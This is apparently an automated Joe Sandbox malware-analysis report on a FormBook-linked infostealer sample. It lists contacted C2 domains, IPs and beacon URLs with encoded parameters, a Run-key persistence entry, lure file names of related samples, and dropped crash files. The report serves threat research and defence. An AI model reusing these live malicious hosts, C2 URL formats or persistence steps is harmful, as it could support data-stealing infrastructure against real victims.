            http://www.primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA=0%Avira URL Cloudsafe
            http://www.bayviewcribbage.com0%Avira URL Cloudsafe
            https://www.united-domains.de/unternehmen/kontakt/0%Avira URL Cloudsafe
            http://www.limpiezasbarcelo.com/utkc/0%Avira URL Cloudsafe
            http://primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL140%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.le-kuk.shop
            		89.31.143.90
            		truetrue
              		unknown
              www.xuzfceth.com
              		152.32.156.214
              		truetrue
                		unknown
                www.salecost.co.uk
                		185.151.30.199
                		truetrue
                  		unknown
                  onstatic-pt.setupdns.net
                  		81.88.57.70
                  		truetrue
                    		unknown
                    lcmoji.lc301adbt.com
                    		156.251.142.107
                    		truefalse
                      		unknown
                      www.primefindsstore.shop
                      		23.105.172.12
                      		truetrue
                        		unknown
                        www.hondamechanic.today
                        		64.190.62.22
                        		truetrue
                          		unknown
                          limpiezasbarcelo.com
                          		81.88.48.71
                          		truetrue
                            		unknown
                            www.vertilehub.xyz
                            		203.161.49.220
                            		truetrue
                              		unknown
                              ghs.googlehosted.com
                              		142.250.185.83
                              		truefalse
                                		unknown
                                www.videos60.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.ecurtiscustoms.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bayviewcribbage.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.top65s.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.theestrellastore.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.limpiezasbarcelo.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.bayviewcribbage.com/odz6/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.le-kuk.shop/obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk=true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.videos60.com/hfmm/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.salecost.co.uk/lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk=true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.limpiezasbarcelo.com/utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyNtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.xuzfceth.com/wvfe/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.salecost.co.uk/lxk5/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyNfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.vertilehub.xyz/ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM=true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.top65s.com/awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0=false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.primefindsstore.shop/hfkt/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.xuzfceth.com/wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk=true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.top65s.com/awbu/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.videos60.com/hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyNtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.vertilehub.xyz/ei4t/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA=true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.limpiezasbarcelo.com/utkc/true
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabsc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/ac/?q=sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.united-domains.de/email_website/homepage-baukasten/sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://upx.sf.netAmcache.hve.9.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.ecosia.org/newtab/sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://bqtt8ppp.com:301sc.exe, 0000000D.00000002.3946994371.0000000004278000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.0000000003AA8000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.united-domains.de/neue-top-level-domain/sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Trsc.exe, 0000000D.00000002.3946994371.000000000509A000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.00000000048CA000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.united-domains.de/unternehmen/datenschutz/sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.united-domains.de/login/sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.united-domains.desc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.united-domains.de/sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.united-domains.de/unternehmen/kontakt/sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.bayviewcribbage.comNwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3948817261.0000000005854000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14sc.exe, 0000000D.00000002.3946994371.0000000004BE4000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.0000000004414000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            156.251.142.107
                                            		lcmoji.lc301adbt.comSeychelles
                                            		40065CNSERVERSUSfalse
                                            23.105.172.12
                                            		www.primefindsstore.shopUnited States
                                            		30633LEASEWEB-USA-WDCUStrue
                                            64.190.62.22
                                            		www.hondamechanic.todayUnited States
                                            		11696NBS11696UStrue
                                            203.161.49.220
                                            		www.vertilehub.xyzMalaysia
                                            		45899VNPT-AS-VNVNPTCorpVNtrue
                                            142.250.185.83
                                            		ghs.googlehosted.comUnited States
                                            		15169GOOGLEUSfalse
                                            81.88.48.71
                                            		limpiezasbarcelo.comItaly
                                            		39729REGISTER-ASITtrue
                                            89.31.143.90
                                            		www.le-kuk.shopGermany
                                            		15598QSC-AG-IPXDEtrue
                                            152.32.156.214
                                            		www.xuzfceth.comHong Kong
                                            		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKtrue
                                            185.151.30.199
                                            		www.salecost.co.ukUnited Kingdom
                                            		48254TWENTYIGBtrue
                                            81.88.57.70
                                            		onstatic-pt.setupdns.netItaly
                                            		39729REGISTER-ASITtrue

                                            General Information

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1467140
                                            Start date and time:2024-07-03 18:51:08 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 42s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Run name:Run with higher sleep bypass
                                            Number of analysed new started processes analysed:21
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winEXE@21/32@12/10
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 83%
                                            • Number of executed functions: 77
                                            • Number of non-executed functions: 250
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.168.117.173, 4.231.128.59
                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, atm-settingsfe-prod-geo2.trafficmanager.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, umwatson.events.data.microsoft.com, settings-prod-neu-3.northeurope.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:52:54API Interceptor7213653x Sleep call for process: sc.exe modified
                                            18:52:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PTR4CRBH C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            18:52:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PTR4CRBH C:\Program Files (x86)\Windows Media Player\wmplayer.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            156.251.142.107z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                            • www.top65s.com/awbu/
                                            MUESTRA DE ORDEN DE COMPRA pdf.exeGet hashmaliciousFormBookBrowse
                                            • www.top65s.com/awbu/
                                            23.105.172.12ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                            • www.primefindsstore.shop/hfkt/
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • www.primefindsstore.shop/hfkt/
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • www.primefindsstore.shop/hfkt/
                                            z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                            • www.primefindsstore.shop/hfkt/
                                            ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                            • www.primefindsstore.shop/hfkt/
                                            MUESTRA DE ORDEN DE COMPRA pdf.exeGet hashmaliciousFormBookBrowse
                                            • www.primefindsstore.shop/hfkt/
                                            64.190.62.22CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
                                            • www.tutoringservices-jp.space/7kq8/
                                            Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                                            • www.hondamechanic.today/pv57/
                                            spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                            • www.hondamechanic.today/pv57/
                                            1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                            • www.turf-installer.top/huho/
                                            Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                            • www.hofiw.link/7ixz/
                                            ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                            • www.hondamechanic.today/expp/
                                            Transfer Swift USD 87000.exeGet hashmaliciousFormBookBrowse
                                            • www.chefjob6.live/vpkv/
                                            unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.woodsplitter1.xyz/9h33/
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • www.hondamechanic.today/expp/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            www.salecost.co.ukORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                            • 185.151.30.199
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • 185.151.30.199
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • 185.151.30.199
                                            z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                            • 185.151.30.199
                                            ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                            • 185.151.30.199
                                            MUESTRA DE ORDEN DE COMPRA pdf.exeGet hashmaliciousFormBookBrowse
                                            • 185.151.30.199
                                            www.le-kuk.shopORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                            • 89.31.143.90
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • 89.31.143.90
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • 89.31.143.90
                                            z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                            • 89.31.143.90
                                            ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                            • 89.31.143.90
                                            MUESTRA DE ORDEN DE COMPRA pdf.exeGet hashmaliciousFormBookBrowse
                                            • 89.31.143.90
                                            BANK DETAILS CORRECTIONS.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 89.31.143.90
                                            www.xuzfceth.comORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                            • 152.32.156.214
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • 152.32.156.214
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • 152.32.156.214
                                            z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                            • 152.32.156.214
                                            ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                            • 152.32.156.214
                                            MUESTRA DE ORDEN DE COMPRA pdf.exeGet hashmaliciousFormBookBrowse
                                            • 152.32.156.214
                                            PI for #13288.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 152.32.156.214
                                            LAPG Purchase Order 1112895.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 152.32.156.214
                                            Payment for PO # 12946.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 152.32.156.214

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CNSERVERSUS03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeGet hashmaliciousFormBookBrowse
                                            • 162.209.189.212
                                            9098393827383039.exeGet hashmaliciousFormBookBrowse
                                            • 198.16.50.172
                                            HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                            • 198.16.50.172
                                            Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • 198.16.50.172
                                            Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                            • 162.209.189.210
                                            SJ5SyRpCFA.elfGet hashmaliciousUnknownBrowse
                                            • 154.88.57.118
                                            PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                                            • 198.16.50.172
                                            arm4-20240623-0650.elfGet hashmaliciousMiraiBrowse
                                            • 156.251.245.85
                                            ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                            • 156.251.142.108
                                            NBS11696USCMV610942X6UI.exeGet hashmaliciousFormBookBrowse
                                            • 64.190.62.22
                                            Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                                            • 64.190.62.22
                                            spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                            • 64.190.62.22
                                            Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                            • 64.190.63.222
                                            gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                            • 64.190.63.222
                                            Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                            • 64.190.63.222
                                            gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                            • 64.190.63.222
                                            1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                            • 64.190.62.22
                                            Reporte Comercial.pdfGet hashmaliciousUnknownBrowse
                                            • 64.190.63.136
                                            VNPT-AS-VNVNPTCorpVNYour file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.41.207
                                            CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.62.199
                                            Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.49.220
                                            spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.49.220
                                            AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.50.127
                                            file.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.43.228
                                            fisher man.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.55.124
                                            GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.55.102
                                            MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                            • 203.161.43.228
                                            LEASEWEB-USA-WDCUShttp://www.xfinityconnect.comcastappmobile.162-240-172-219.cprapid.comGet hashmaliciousUnknownBrowse
                                            • 207.244.64.92
                                            ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                            • 23.105.172.12
                                            https://www.barstoolsports.com/blog/3517288/i-would-fucking-kill-you-right-now-if-i-could-kelly-and-tate-finally-met-in-chicago-and-boy-oh-boy-was-it-fireworks#story-commentsGet hashmaliciousUnknownBrowse
                                            • 162.210.196.208
                                            https://www.pcna.com/en-ca/product/folding-moon-chair-400lb-capacity-1070-94Get hashmaliciousUnknownBrowse
                                            • 192.96.202.199
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • 23.105.172.12
                                            BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                            • 23.105.172.12
                                            z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                            • 23.105.172.12
                                            ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                            • 23.105.172.12
                                            MUESTRA DE ORDEN DE COMPRA pdf.exeGet hashmaliciousFormBookBrowse
                                            • 23.105.172.12

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_14K3HQLSMFEQUGXV_b459fda994f63613fd3f413413133f89faf9749f_6c848b9a_66d5c219-ea77-4678-8787-4be4333f52c9\Report.wer

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):1.2110906069673681
                                            Encrypted:false
                                            SSDEEP:192:Fs4wCJjF4i0VeWpZaWBeHA9cOIDzuiFcZ24lO8GV6qH:64wCJ5OVBpZammAduzuiFcY4lO88ZH
                                            MD5:25B7E8108DF85A232EE6699B6BF82F47
                                            SHA1:8747021689F9B2A3F30FE59AD8085E5DD5302B69
                                            SHA-256:B5A09BD5697FE8982A4EDD72C966D41D6E0A90708650FB8404919855B440C92C
                                            SHA-512:C60294C6D08F7EB4A09B51238767439998982789D92150BDEF0786E583BADEE3D1A6445E6DC74A8B062A38F1FE550D6AAEF78FAD964AED21044201DAE2A7197E
                                            Malicious:false
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.4.9.9.1.1.8.1.5.6.6.0.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.4.9.9.1.1.9.0.4.7.2.3.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.d.5.c.2.1.9.-.e.a.7.7.-.4.6.7.8.-.8.7.8.7.-.4.b.e.4.3.3.3.f.5.2.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.a.d.2.0.4.0.-.1.3.5.1.-.4.d.7.4.-.9.7.1.c.-.d.e.e.a.3.c.6.2.3.e.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.6.4...P.W.S.X.-.g.e.n...1.4.7.9.2...1.3.7.1.5...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.t.a.f.u.d.e.q.o.s.u.b.u.j.a.s.u.g.a.z.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.e.8.-.0.0.0.1.-.0.0.1.5.-.2.d.c.3.-.b.0.4.f.6.9.c.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.2.f.a.3.e.9.7.a.7.1.c.3.7.1.a.c.0.2.9.d.e.2.7.6.c.7.b.1.f.3.c.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.9.0.d.4.9.e.f.3.2.

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BF4.tmp.dmp

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Mini DuMP crash report, 16 streams, Wed Jul 3 16:51:58 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):467797
                                            Entropy (8bit):3.166600784102374
                                            Encrypted:false
                                            SSDEEP:6144:qo89TbiAqx5AY63QwgfFQNSCfKV1+g5DokFBWMZ:qJ9iAqsYaQ1lK
                                            MD5:94F51452597557CEEF662DB2D9524015
                                            SHA1:9FF163DC095BCC931A8A6E850512C6AA5894170B
                                            SHA-256:C44BAB398E9E476123CCA17613A43BD6879E4D518DBEE1D2D3DD40E91DF37CC5
                                            SHA-512:D1FB3698E8DC084D52795772F312DCBE2458CA3D1BA0BB309FEAB5D559DDD31FF32144A533BE79BEEED975E23733284968A8932867688998FDC27A8AAC4E21C3
                                            Malicious:false
                                            Preview:MDMP..a..... ..........f............t...........H...........$....%......x....&......$L..P...........l.......8...........T...........h9..............xC..........dE..............................................................................eJ.......E......Lw......................T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E18.tmp.WERInternalMetadata.xml

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
